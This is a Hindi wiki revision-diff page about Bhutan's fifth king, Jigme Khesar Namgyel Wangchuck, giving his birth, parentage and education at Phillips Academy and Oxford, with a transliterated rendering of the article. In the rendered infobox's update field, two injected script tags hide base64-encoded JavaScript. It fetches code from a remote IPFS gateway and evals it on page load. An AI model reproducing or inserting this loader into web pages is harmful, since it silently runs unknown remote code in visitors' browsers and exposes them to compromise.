Difference between revisions of "जिग्मे खेसर नामग्याल वांग्चुक"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 18: Line 18:
 
|खोज=
 
|खोज=
 
|भाषा=
 
|भाषा=
|शिक्षा=एमफिल
+
|शिक्षा=राजनीतिशास्त्र में एमफिल
 
|विद्यालय=ऑक्सफ़ोर्ड विश्वविद्यालय, मैग्डेलन कॉलेज (इंग्लैंड)
 
|विद्यालय=ऑक्सफ़ोर्ड विश्वविद्यालय, मैग्डेलन कॉलेज (इंग्लैंड)
 
|पुरस्कार-उपाधि=
 
|पुरस्कार-उपाधि=
|प्रसिद्धि=
+
|प्रसिद्धि=भूटान के पाँचवें राजा
 
|विशेष योगदान=
 
|विशेष योगदान=
 
|नागरिकता=
 
|नागरिकता=
Line 35: Line 35:
 
|शीर्षक 5=
 
|शीर्षक 5=
 
|पाठ 5=
 
|पाठ 5=
|अन्य जानकारी=जिग्मे खेसर नामग्याल वांगचुक ने [[इंग्लैंड]] के मैग्डेलन कॉलेज, ऑक्सफ़ोर्ड विश्वविद्यालय से राजनीतिशास्त्र में एमफिल की डिग्री प्राप्त की।
+
|अन्य जानकारी=
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
|अद्यतन=
+
|अद्यतन={{अद्यतन|17:59, 26 अप्रॅल 2017 (IST)}}
 
}}
 
}}
 
'''जिग्मे खेसर नामग्याल वांगचुक''' ([[अंग्रेज़ी]]: ''Jigme Khesar Namgyel Wangchuck'', जन्म: [[21 फ़रवरी]], [[1980]]) [[भूटान]] के पाँचवें राजा हैं। वह सबसे कम उम्र में भूटान के राजा बनने वाले व्यक्ति हैं। वे वांगचुक वंश के मुखिया हैं।
 
'''जिग्मे खेसर नामग्याल वांगचुक''' ([[अंग्रेज़ी]]: ''Jigme Khesar Namgyel Wangchuck'', जन्म: [[21 फ़रवरी]], [[1980]]) [[भूटान]] के पाँचवें राजा हैं। वह सबसे कम उम्र में भूटान के राजा बनने वाले व्यक्ति हैं। वे वांगचुक वंश के मुखिया हैं।
  
 +
*जिग्मे खेसर नामग्याल वांगचुक का जन्म [[काठमांडू]], [[नेपाल]] में हुआ।
 
*जिग्मे खेसर नामग्याल वांगचुक किसी भी देश के सबसे कम उम्र के राष्ट्राध्यक्ष हैं।
 
*जिग्मे खेसर नामग्याल वांगचुक किसी भी देश के सबसे कम उम्र के राष्ट्राध्यक्ष हैं।
*वे भूटान के राजा जिग्मे सिंघे वांगचुक एवं उनकी तीसरी पत्नी रानी अशी के सबसे बडे़ पुत्र हैं
+
*वे भूटान के राजा जिग्मे सिंघे वांगचुक एवं उनकी तीसरी पत्नी रानी अशी के सबसे बडे़ पुत्र हैं।
 
*जिग्मे खेसर नामग्याल वांगचुक ने अपनी प्रारम्भिक शिक्षा भूटान में ही पूर्ण की और फिर विदेशों में फिलिप्स अकैडमी (एंडोवर), कसिंग अकैडमी एवं व्हीटॉन कॉलेज मैसाचुएटस, [[अमरीका]] में शिक्षा ग्रहण करने गये।
 
*जिग्मे खेसर नामग्याल वांगचुक ने अपनी प्रारम्भिक शिक्षा भूटान में ही पूर्ण की और फिर विदेशों में फिलिप्स अकैडमी (एंडोवर), कसिंग अकैडमी एवं व्हीटॉन कॉलेज मैसाचुएटस, [[अमरीका]] में शिक्षा ग्रहण करने गये।
 
*अमरीका के बाद उन्होंने [[इंग्लैंड]] के मैग्डेलन कॉलेज, ऑक्सफ़ोर्ड विश्वविद्यालय से राजनीतिशास्त्र में एमफिल की डिग्री प्राप्त की।
 
*अमरीका के बाद उन्होंने [[इंग्लैंड]] के मैग्डेलन कॉलेज, ऑक्सफ़ोर्ड विश्वविद्यालय से राजनीतिशास्त्र में एमफिल की डिग्री प्राप्त की।

Revision as of 12:29, 26 April 2017

jigme khesar namagyal vaangchuk
poora nam jigme khesar namagyal vaangachuk
janm 21 faravari, 1980
janm bhoomi kathamaandoo, nepal
abhibhavak jigme sianghe vaangachuk aur rani ashi
pati/patni jeth‌san pema
shiksha rajanitishastr mean emaphil
vidyalay aauksaford vishvavidyalay, maigdelan k aaulej (ianglaiand)
prasiddhi bhootan ke paanchavean raja
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jigme khesar namagyal vaangachuk (aangrezi: Jigme Khesar Namgyel Wangchuck, janm: 21 faravari, 1980) bhootan ke paanchavean raja haian. vah sabase kam umr mean bhootan ke raja banane vale vyakti haian. ve vaangachuk vansh ke mukhiya haian.

  • jigme khesar namagyal vaangachuk ka janm kathamaandoo, nepal mean hua.
  • jigme khesar namagyal vaangachuk kisi bhi desh ke sabase kam umr ke rashtradhyaksh haian.
  • ve bhootan ke raja jigme sianghe vaangachuk evan unaki tisari patni rani ashi ke sabase bade़ putr haian.
  • jigme khesar namagyal vaangachuk ne apani prarambhik shiksha bhootan mean hi poorn ki aur phir videshoan mean philips akaidami (eandovar), kasiang akaidami evan vhit aaun k aaulej maisachuetas, amarika mean shiksha grahan karane gaye.
  • amarika ke bad unhoanne ianglaiand ke maigdelan k aaulej, aauksaford vishvavidyalay se rajanitishastr mean emaphil ki digri prapt ki.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh